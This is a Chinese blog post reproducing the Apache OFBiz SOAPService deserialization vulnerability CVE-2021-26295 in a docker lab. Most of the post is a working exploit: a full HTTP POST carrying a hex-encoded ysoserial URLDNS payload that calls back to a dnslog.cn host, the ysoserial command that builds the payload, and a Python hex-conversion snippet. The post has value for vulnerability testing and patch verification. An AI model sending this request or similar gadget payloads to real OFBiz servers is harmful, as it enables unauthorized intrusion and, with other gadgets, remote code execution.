CVE-2021-26295 Apache OFBiz rmi反序列化漏洞复现

作者: print("") 分类: 信息安全发布时间: 2021-03-23 19:20 阅读次数: 3,309 次

一、环境搭建

docker run -d -p 811:8080 -p 8443:8443  opensourceknight/ofbiz

直接启动Docker

然后访问811 或者https://ip/8443

POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.1.79:811
Content-Length: 1007
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
		<soapenv:Header/>
		<soapenv:Body>
		<ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400106b7a6a7466742e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f6b7a6a7466742e646e736c6f672e636e78</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="http://kif4v7.dnslog.cn"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
		</ser>
		</soapenv:Body>
		</soapenv:Envelope>

中间的cus-obj 直接用

java -jar ysoserial.jar URLDNS  http://kzjtft.dnslog.cn >1.ot

然后转成hex 即可

import binascii
filename = '1.ot'
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content))

Apache OFBiz rmi CVE-2021-26295

如果觉得我的文章对您有用，请随意打赏。您的支持将鼓励我继续创作！

CVE-2021-26295 Apache OFBiz rmi反序列化 漏洞复现

发表回复 取消回复

CVE-2021-26295 Apache OFBiz rmi反序列化漏洞复现

发表回复取消回复